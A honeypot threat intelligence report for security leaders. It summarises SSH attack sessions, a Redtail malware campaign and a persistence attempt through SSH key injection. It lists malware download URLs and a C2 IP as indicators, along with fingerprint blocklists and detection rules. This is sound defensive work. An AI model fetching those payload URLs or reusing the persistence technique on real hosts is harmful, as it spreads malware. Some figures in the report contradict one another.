█                         THREAT INTELLIGENCE REPORT — CISO STRATEGIC BRIEF                        █
█                         Cowrie SSH Honeypot  |  LP1 + LP2 Combined Harvest                       █
█                                                                                                  █
████████████████████████████████████████████████████████████████████████████████████████████████████

  CAMPAIGN OVERVIEW───────────────────────────────────────────────────────────────────────────────
  Engagement Period:  LP1 Feb 3–6, 2025  |  LP2 Feb 11 – Mar 5, 2025 (33-day window)
  Honeypot Nodes:     Two US-East AWS instances (South Carolina + Virginia)
  Total Sessions:     25,880
  Human-Classified:   6  (interactive actors, ML-confirmed)
  Primary Origin:     China
  SSH Tooling:        6 distinct client libraries identified

  OVERALL RISK RATING─────────────────────────────────────────────────────────────────────────────
  ┌─────────────────────────────────┐
  │   RISK LEVEL:  [  CRITICAL  ]   │  ← Confirmed malware delivery + human actor
  │   CONFIDENCE:  HIGH             │  ← ML classification + VT hash confirmation
  │   PERSISTENCE: CONFIRMED        │  ← 33-day LP1→LP2 cross-node continuity
  └─────────────────────────────────┘

  STRATEGIC KEY FINDINGS──────────────────────────────────────────────────────────────────────────

  [FINDING 1]  PERSISTENT BOTNET INFRASTRUCTURE — LP1→LP2 CONTINUITY
  The dominant SSH client fingerprint (HASSH: 16443846...184e) observed in LP1
  (South Carolina, Feb 3–6) reappeared in LP2 (Virginia, Feb 11 – Mar 5).
  Same custom tooling, different hosting node, 33-day sustained operation.
  IMPLICATION: This is not opportunistic scanning. This is a managed,
  geographically distributed botnet with persistent C2 infrastructure.

  [FINDING 2]  REDTAIL MULTI-ARCHITECTURE MALWARE CAMPAIGN
  Source IP 130.12.180.51 (United Kingdom) executed 49 delivery cycles
  deploying 6 unique payloads targeting 6 architectures
  (arm7, arm8, i686, x86_64). Consistent with botnet infrastructure build-out.
  VirusTotal: API key not configured — set VIRUSTOTAL_API_KEY in Phase IV
  to enable live hash confirmation. Browse URLs generated for manual review.
  IMPLICATION: Active cryptomining/botnet recruitment campaign with
  multi-architecture targeting indicates professional threat actor.

  [FINDING 3]  HUMAN ACTOR — JIM HARRIS PERSONA ENGAGED
  Timing-based cognitive friction confirmed (Phase VIII >3s pauses).
  Command-level file access not confirmed in this run.
  IMPLICATION: Human-speed interaction detected — file content reviewed
  but read commands not explicitly captured in command log.

  [FINDING 4]  SSH KEY INJECTION PERSISTENCE ATTEMPT (T1098.004)
  ACTOR-873270 deployed 64 proxy IPs attempting SSH authorized_keys
  injection combined with chattr immutability to prevent removal.
  IMPLICATION: If successful on a production system, this attack establishes
  an unkillable backdoor. Priority remediation: audit .ssh/authorized_keys
  on all internet-facing Linux hosts and enforce chattr monitoring.

  STRATEGIC RECOMMENDATIONS───────────────────────────────────────────────────────────────────────
  1. Deploy HASSH-based detection on all SSH ingress — block the three
     campaign-flagged fingerprints (Phase VI IOC table).
  2. Enforce SSH key audit cadence on all internet-facing Linux hosts.
     ACTOR-873270 persistence method (T1098.004) is production-viable.
  3. Block Redtail staging infrastructure: 130.12.180.51 and all
     URLs from the Phase X IOC table at perimeter firewall.
  4. Consider honeypot-as-intelligence-collection: LP2 produced actionable
     IOCs in 22 days. Recommend operationalising this pipeline as a
     continuous threat feed into your SIEM.
  5. If VirusTotal API key is available — run Phase IV with key set to
     obtain live maliciousness scores for all ? payload hashes.

════════════════════════════════════════════════════════════════════════════════════════════════════

▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
█                                                                                                  █
▓                             SOC MANAGER — TACTICAL INTELLIGENCE BRIEF                            ▓
▓                       Immediate Action Items  |  IOCs  |  Detection Guidance                     ▓
█                                                                                                  █
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓

  IMMEDIATE ACTION ITEMS (Priority Order)─────────────────────────────────────────────────────────
  [P1] BLOCK: 130.12.180.51 — Redtail malware C2 (UK, 49 delivery cycles)
  [P1] BLOCK: All URLs from the IOC table below at web proxy/firewall
  [P1] AUDIT: .ssh/authorized_keys on all internet-facing Linux hosts
  [P2] ALERT: SSH connections using HASSH 01ca3558... or 03a80b21...
  [P2] ALERT: chattr commands on any production system (T1222 evasion)
  [P3] REVIEW: Any logins from China (65% of KEX volume), India, US-origin ASNs

  NETWORK INDICATORS OF COMPROMISE────────────────────────────────────────────────────────────────
  Type      Indicator                                                 Hits  Actor          
  --------  -------------------------------------------------------  -----  ---------------
  URL       http://47.242.108.71:60107/linux                             2  Unknown        
  URL       http://47.254.126.99:60100/linux                             2  Unknown        
  URL       http://165.154.235.116:60123/linux                           1  Unknown        
  URL       http://36.133.126.84:60131/linux                             1  Unknown        
  URL       http://47.243.23.38:60137/linux                              1  Unknown        

  SSH CLIENT FINGERPRINT BLOCKLIST (HASSH)────────────────────────────────────────────────────────
  HASSH Fingerprint                     Label                                     Sessions
  ------------------------------------  ----------------------------------------  --------
  01ca35584ad5a1b66cf6a9846b5b2821      Unidentified Custom Tooling (LP2 Primar     15,612 ◀ BLOCK
  acaa53e0a7d7ac7d1255103f37901306      Unidentified Custom Tooling                  4,331
  03a80b21afa810682a776a7d42e5e6fb      Unidentified Custom Tooling (SSH Key In        943 ◀ BLOCK
  5f904648ee8964bef0e8834012e26003      Unidentified Custom Tooling (uname -s -        709
  19532158b559096b89b1a5f7d17175b2      Unidentified Custom Tooling                    344
  16443846184eafde36765c9bab2f4397      Unidentified Custom Tooling (LP1 Primar        286 ◀ BLOCK

  OBSERVED KILL CHAIN SEQUENCES (Multi-Stage)─────────────────────────────────────────────────────
  [  15×]  T1057 ➔ T1595
  [   3×]  T1595 ➔ T1222 ➔ T1595
  [   3×]  T1098.004 ➔ T1082 ➔ T1595 ➔ T1082 ➔ T1595 ➔ T1082 ➔ T1595 ➔ T1082 ➔ T1033 ➔ T1595  [PERSIST]
  [   2×]  T1595 ➔ T1222 ➔ T1595 ➔ T1222 ➔ T1595

  CREDENTIAL TARGETING INTELLIGENCE───────────────────────────────────────────────────────────────
  Total credential attempts: 1,476
  Top 5 targeted passwords:
    admin                                264 attempts
    P                                    195 attempts
    orangepi                             136 attempts
    3245gs5662d34                        111 attempts
    345gs5662d34                         107 attempts

  DETECTION GUIDANCE — MITRE ATT&CK───────────────────────────────────────────────────────────────
  Technique                                             Events  Detection Rule
  --------------------------------------------------  --------  ----------------------------
  T1059.004 (Unix Shell / Echo Swarm Verification)      15,615  Alert on hex-encoded echo in non-admin sessions
  T1082 (System Information Discovery)                     343  Baseline then alert on uname/id burst (>10/min)
  T1098.004 (SSH Authorized Keys — Persistence)            332  Alert on authorized_keys + chattr combination
  T1595 (Active Scanning / Unmapped)                        61  Review logs
  T1057 (Process Discovery)                                 34  Review logs
  T1222 (File Permissions Modification)                      7  Alert on chattr +i on system directories
  T1033 (System Owner/User Discovery)                        3  Review logs

════════════════════════════════════════════════════════════════════════════════════════════════════

About the Author¶

Justin McCormick is a cybersecurity and threat intelligence practitioner with a background in military intelligence operations and applied analytics. His professional experience spans operational intelligence collection - combining analytic tradecraft with data-driven methodologies to better understand adversarial behavior and deliver these actionable insights to stakeholders.

This project reflects a deliberate effort to bridge intelligence analysis with modern machine learning workflows to develop proprietary tooling to assist with personal and professional research objectives. While contemporary large language models and AI-assisted development tools were leveraged to accelerate architectural ideation and prototyping, all modeling decisions, feature engineering strategies, visualizations, and analytical interpretations were independently validated as well as iteratively refined. The intent was not automation for its own sake, but disciplined augmentation — using modern tools to keep pace with the current threat landscape while preserving critical thinking and technical ownership.

Justin is particularly interested in the intersection of threat intelligence, cybersecurity operations across all domains (Enterprise, ICS/OT, Mobile), as well as emerging technologies and how these capabilities are wielded by adversaries - to include applied artificial intelligence. His long-term objective is to contribute meaningfully to the general understanding of the ever-evolving threat environment, design secure and scalable systems to bolster security efforts while mentoring the next generation of analysts and engineers through practical instruction and applied research.

This notebook represents both a technical exploration and a step toward that broader mission.


If you wondering about the project title - "Lost Piglet?"

See the Dana Carvey clip below, as this was stuck in my head throughout the project's ideation. The sketch may be old, but I can assure the reader: "it's a good one - Piglet gets Lost."

Dana Carvey - "Get a 100 year old man"